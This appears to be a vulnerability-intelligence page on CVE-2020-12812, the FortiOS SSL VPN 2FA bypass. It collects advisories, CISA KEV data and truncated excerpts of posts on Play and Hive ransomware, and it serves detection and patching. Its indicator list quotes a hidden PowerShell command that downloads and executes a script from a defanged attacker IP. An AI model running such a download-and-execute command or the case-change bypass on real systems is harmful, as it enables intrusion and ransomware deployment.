CVE-2020-12812
published 2020-07-24CVE-2020-12812: An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully…
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWRansomware
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
49.34%
98.7th percentile
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fortinet | fortios | < 6.0.10 | 6.0.10 |
| fortinet | fortios | — | — |
| fortinet | fortios | — | — |
| fortinet | fortios | >= 6.2.0 < 6.2.4 | 6.2.4 |
| fortinet | fortitoken | — | — |
Detection & IOCsextracted from sources · hover to see the quote
command-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('hxxp://84.32.190[.]37:80/ahgffxvbghgfv'))"↗
- →CVE-2020-12812 exploitation is triggered by changing the case of the username during SSL VPN authentication, allowing bypass of FortiToken 2FA. Detect anomalous SSL VPN logins where the username case differs from the registered account, particularly when LDAP authentication is in use. ↗
- →A misconfigured secondary LDAP Group used as fallback when local LDAP authentication fails is a key enabler of this attack. Audit FortiGate configurations for unnecessary secondary LDAP Groups and remove them to reduce attack surface. ↗
- →Play ransomware ransom notes follow the email format [seven random characters]@gmx[.]com. Hunt for this pattern in ransom note files (ReadMe.txt at C:\) to identify Play infections. ↗
- →Play ransomware uses a PHP-based web page to receive exfiltrated files. Monitor for outbound HTTP POST traffic to PHP upload endpoints (e.g., /u2/upload.php) as an exfiltration indicator. ↗
- ·CVE-2020-12812 only affects FortiOS versions 6.4.0, 6.2.0 to 6.2.3, and 6.0.9 and below. Patched versions are FortiOS 6.4.1, 6.2.4, and 6.0.10 (released July 2020). Devices running patched versions are not vulnerable. ↗
- ·The vulnerability requires a specific configuration to be exploitable: local user entries on the FortiGate must require 2FA, be linked to LDAP, and those users must belong to an LDAP group configured on the FortiGate. Devices without this configuration are not vulnerable to the 2FA bypass. ↗
- ·As a temporary workaround for unpatched systems, Fortinet advises turning off username-case-sensitivity to prevent the 2FA bypass, and disabling all SSL-VPN functions until updates can be applied. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2020-12812 [CRITICAL] CWE-178 Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Vulnerability: Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Affected: Fortinet FortiOS
Fortinet FortiOS SSL VPN contains an improper authentication vulnerability that may allow a user to login successfully without being prompted for the second factor of authentication (FortiToken) if they change the case in their username.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2020-12812
Remediation Due Date: 2022-05-03
Fortinet
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a us...
vendor_fortinet·2020-07-24·CVSS 9.8
CVE-2020-12812 [CRITICAL] CWE-178 An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a us...
FG-IR-19-283: An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a us...
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
CVEs: CVE-2020-12812
CWEs: CWE-178, CWE-287
CVSS: 9.8 (critical)
Affected products: FortiOS, FortiToken
GHSA
GHSA-r9cj-q2hj-hfq9: An improper authentication vulnerability in SSL VPN in FortiOS 6
ghsa_unreviewed·2022-05-24
CVE-2020-12812 [HIGH] CWE-178 GHSA-r9cj-q2hj-hfq9: An improper authentication vulnerability in SSL VPN in FortiOS 6
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.
VulnCheck
Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
vulncheck·2020·CVSS 9.8
CVE-2020-12812 [CRITICAL] CWE-178 Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Fortinet FortiOS SSL VPN Improper Authentication Vulnerability
Fortinet FortiOS SSL VPN contains an improper authentication vulnerability that may allow a user to login successfully without being prompted for the second factor of authentication (FortiToken) if they change the case in their username.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ic3.gov/media/news/2021/210402.pdf; https://www.ic3.gov/media/news/2021/210527.pdf; https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-209a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://us-cert.cisa.gov/ncas/alerts/aa21-321a; https://cisa.gov/news-events/cybersecurity-advisori
No detection rules found.
No public exploits indexed.
Bleepingcomputer
Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass
blogs_bleepingcomputer·2026-01-02·CVSS 9.8
CVE-2020-12812 [CRITICAL] Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass
## Over 10K Fortinet firewalls exposed to actively exploited 2FA bypass
## Sergiu Gatlan
Over 10,000 Fortinet firewalls are still exposed online and vulnerable to ongoing attacks exploiting a five-year-old critical two-factor authentication (2FA) bypass vulnerability.
Fortinet released FortiOS versions 6.4.1, 6.2.4, and 6.0.10 in July 2020 to address this flaw (tracked as CVE-2020-12812 ) and advised admins who couldn't immediately patch to turn off username-case-sensitivity to block 2FA bypass attempts targeting their devices.
This improper authentication security flaw (rated 9.8/10 in severity) was found in FortiGate SSL VPN and allows attackers to log in to unpatched firewalls without being prompted for the second factor of authentication (FortiToken) when the username's case is cha
Bleepingcomputer
Fortinet warns of 5-year-old FortiOS 2FA bypass still exploited in attacks
blogs_bleepingcomputer·2025-12-29·CVSS 9.8
CVE-2020-12812 [CRITICAL] Fortinet warns of 5-year-old FortiOS 2FA bypass still exploited in attacks
## Fortinet warns of 5-year-old FortiOS 2FA bypass still exploited in attacks
## Sergiu Gatlan
Fortinet has warned customers that threat actors are still actively exploiting a critical FortiOS vulnerability that allows them to bypass two-factor authentication (2FA) when targeting vulnerable FortiGate firewalls.
Tracked as CVE-2020-12812 , this improper authentication security flaw was found in FortiGate SSL VPN and enables attackers to log in to unpatched firewalls without being prompted for the second factor of authentication (FortiToken) when changing the case of the username.
"This happens when two-factor authentication is enabled in the 'user local' setting, and that user authentication type is set to a remote authentication method (eg: ldap)," Fortinet explained when it patched th
Fortinet
Product Security Advisory and Analysis: Observed Abuse of FG-IR-19-283 | Fortinet Blog
blogs_fortinet·2025-12-24·CVSS 9.8
CVE-2020-12812 [CRITICAL] Product Security Advisory and Analysis: Observed Abuse of FG-IR-19-283 | Fortinet Blog
PSIRT BLOGS
Product Security Advisory and Analysis: Observed Abuse of FG-IR-19-283
By Carl Windsor | December 24, 2025
Fortinet has observed recent abuse of the July 2020 vulnerability FG-IR-19-283 / CVE-2020-12812 in the wild based on specific configurations. This blog analysis describes the observed abuse and provides additional context so that administrators can confirm that they are not impacted and guidance based on Fortinet observations to prevent FG-IR-19-283 from being exploited.
Issue Description
In specific configurations, due to differences in behavior of LDAP Directories, FortiGates can allow LDAP users with two-factor authentication (2FA) configured to bypass 2FA and instead authenticate against LDAP directly.
This particular authentication behavior is caused by FortiGate
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
blogs_tenable·2025-01-14·CVSS 9.8
[CRITICAL] CVE-2024-55591: Fortinet Authentication Bypass Zero-Day Vulnerability Exploited in the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
blogs_tenable·2024-02-09·CVSS 9.8
[CRITICAL] CVE-2024-21762: Critical Fortinet FortiOS Out-of-Bound Write SSL VPN Vulnerability
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
blogs_tenable·2023-08-03
AA23-215A: 2022's Top Routinely Exploited Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
Hive
blogs_sentinelone·2022-11-30
Hive
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Tenable
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
blogs_tenable·2022-09-15
AA22-257A: Cybersecurity Agencies Issue Joint Advisory on Iranian Islamic Revolutionary Guard Corps-Affiliated Attacks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
## Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares 2022/09/06 Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PL
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
# Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares
Sep 06, 2022
Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
## Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares Sep 06, 2022 Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “
Trendmicro
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
blogs_trendmicro·2022-09-06
Play Ransomware Attack Playbook Similar to that of Hive, Nokoyawa
Ransomware
# Play Ransomware's Attack Playbook Similar to that of Hive, Nokoyawa
Play is a new ransomware that takes a page out of Hive and Nokoyawa's playbook. The many similarities among them indicate that Play, like Nokoyawa, are operated by the same people.
By: Don Ovid Ladores, Lucas Silva, Scott Burden, Janus Agcaoili, Ivan Nicole Chavez, Ian Kenefick, Ieriz Nicolle Gonzalez, Paul Pajares
2022/09/06
Read time: ( words)
Save to Folio
In July, we investigated a spate of ransomware cases in the Latin American region that targeted government entitles, which was initially attributed to a new player known as Play ransomware. This ransomware’s name was derived from its behavior, as it adds the extension “.play” after encrypting files. Its ransom note also contains the single word, “PL
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
blogs_qualys·2021-07-29·CVSS 10.0
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities | Qualys
#### Table of Contents
- Top Routinely Exploited Vulnerabilities
- Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
- Recommendations
- Remediation and Mitigation
- Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the large
Qualys
CISA Alert: Top Routinely Exploited Vulnerabilities
blogs_qualys·2021-07-29·CVSS 9.1
[CRITICAL] CISA Alert: Top Routinely Exploited Vulnerabilities
## Table of Contents
Top Routinely Exploited Vulnerabilities
Detect CISAs Top Routinely Exploited Vulnerabilities using Qualys VMDR
Recommendations
Remediation and Mitigation
Get Started Now
On July 28, 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a cybersecurity advisory detailing the top 30 publicly known vulnerabilities that have been routinely exploited by cyber threat actors in 2020 and 2021. Organizations are advised to prioritize and apply patches or workarounds for these vulnerabilities as soon as possible.
The advisory states, “If an organization is unable to update all software shortly after a patch is released, prioritize implementing patches for CVEs that are already known to be exploited or that would be accessible to the largest numbe
Fortinet
Prioritizing Patching is Essential for Network Integrity
blogs_fortinet·2021-06-01·CVSS 9.1
[CRITICAL] Prioritizing Patching is Essential for Network Integrity
PSIRT BLOGS
Prioritizing Patching is Essential for Network Integrity
By Carl Windsor | June 01, 2021
Regarding the FBI - CISA/NCSC alerts of FortiGate SSL-VPN vulnerabilities being exploited in the wild
A recent FBI advisory outlined that foreign hackers had gained access to a local US municipal government network after exploiting vulnerabilities in an unpatched Fortinet networking appliance.
This advisory, however, was not the result of cybercriminals targeting a newly identified security issue. The sad fact is, fixes for these vulnerabilities had been shared with affected customers over two years ago. This and similar incidents highlight that the failure to patch vulnerable systems still represents one of the most critical security gaps in many organizations and is responsible for th
Zscaler
Reduce Business Risk by Eliminating the VPN Attack Surface
blogs_zscaler·2021-05-27
Reduce Business Risk by Eliminating the VPN Attack Surface
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Tenable
CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
blogs_tenable·2021-04-08·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-5591, CVE-2020-12812: Fortinet Vulnerabilities Targeted by APT Actors
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Fortinet
Patch and Vulnerability Management | Fortinet
blogs_fortinet·2021-04-03·CVSS 6.5
[MEDIUM] Patch and Vulnerability Management | Fortinet
PSIRT BLOGS
Patch and Vulnerability Management
By Carl Windsor | April 03, 2021
In May 2019, Fortinet issued a PSIRT advisory regarding an SSL vulnerability that had been identified by a third party research team and which we resolved. As part of this process, we issued a Customer Support Bulletin (CSB-200716-1) to highlight the need for customers to upgrade their affected systems. We also published a blog about this for our customers in August 2019 when this vulnerability was made public post-resolution at Black Hat in August 2019. Over a year later , the UK NCSC shared that these same vulnerabilities were still being targeted in the wild, and we published another blog in July 2020 and then another in November 2020 with the goal of continuing to educate and communicate with our customer
Threat Intel
Play (Play)
threat_intel·CVSS 9.1
[CRITICAL] Play (Play)
# Threat Actor Profile: Play
ATT&CK ID: G1040
Also known as: Play
## Overview
Play is a ransomware group that has been active since at least 2022 deploying Playcrypt ransomware against the business, government, critical infrastructure, healthcare, and media sectors in North America, South America, and Europe. Play actors employ a double-extortion model, encrypting systems after exfiltrating data, and are presumed by security researchers to operate as a closed group.(Citation: CISA Play Ransomware Advisory December 2023)(Citation: Trend Micro Ransomware Spotlight Play July 2023)
## Techniques (TTPs)
### Resource Development
- T1587.001 Malware
Usage: Play developed and employ Playcrypt ransomware.(Citation: Trend Micro Ransomware Spotlight Play July 2023)(Citation: CISA Play Ransomware A
Sentinelone
Hive
blogs_sentinelone·CVSS 9.8
[CRITICAL] Hive
# Hive Ransomware: In-Depth Analysis, Detection, Mitigation
## Summary of Hive Ransomware
Hive ransomware emerged in June 2021. Hive practices double extortion, demanding payment for a decryptor as well as for the non-release of stolen data. Hive operates as a RaaS (Ransomware-as-a-Service) and their campaigns are characterized as being aggressive and rapid. The payloads are non-stealth in their execution and full drive encryption can be achieved in just a few minutes. Hive operators make significant use of COTS tools and LOLBins during all stages of attack. They are also known to frequently attack healthcare and education organizations.
## What Does Hive Ransomware Target?
Hive ransomware targets a wide range of industries including healthcare, finance, retail, energy and manufacturin
2020-07-24
Published
2021-11-03
Added to CISA KEV
Exploited in the wild